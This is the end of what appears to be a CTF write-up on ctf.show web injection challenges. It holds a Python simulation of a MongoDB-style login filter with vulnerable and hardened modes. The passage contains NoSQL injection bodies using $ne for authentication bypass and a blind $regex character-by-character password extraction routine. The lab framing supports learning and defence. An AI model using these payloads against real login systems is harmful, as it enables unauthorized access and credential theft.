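            for op, arg in cond.items():
                if op == "$ne":
                    if value == arg:
                        return False
                elif op == "$regex":
                    if value is None or re.search(arg, value) is None:
                        return False
                else:
                    raise ValueError(f"operator {op} not modelled")
        elif value != cond:
            return False
    return True


def login(body: str, hardened: bool = False):
    """Usernames a login request would match against the sample collection."""
    params = php_parse_query(body)
    flt = safe_filter(params) if hardened else vulnerable_filter(params)
    return [u["username"] for u in USERS if matches(u, flt)]


def blind_extract(charset: str = "ctf{}1234567890qweryuioplkjhgdsazxvbnm-_", max_len: int = 50) -> str:
    """web253-style extraction: extend the password prefix one character at a time,
    keeping a guess whenever ^prefix still logs in as the user matching 'flag'."""
    found = ""
    for _ in range(max_len):
        for ch in charset:
            if login(f"username[$regex]=flag&password[$regex]=^{re.escape(found + ch)}"):
                found += ch
                break
        else:
            break
        if found.endswith("}"):
            break
    return found
```

login("username[$ne]=1&password[$ne]=1") matches every user, login("username[$ne]=admin&password[$ne]=1") everyone but admin, and the ^[^a].*$ regex from web252 leaves only the flag user; with hardened=True the same bodies are rejected before any query is built.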

Source: http://example.com/2021/03/30/OldBlog/ctf-show-web入门sql注入171-253/
Author: Autumn
Published: 30 March 2021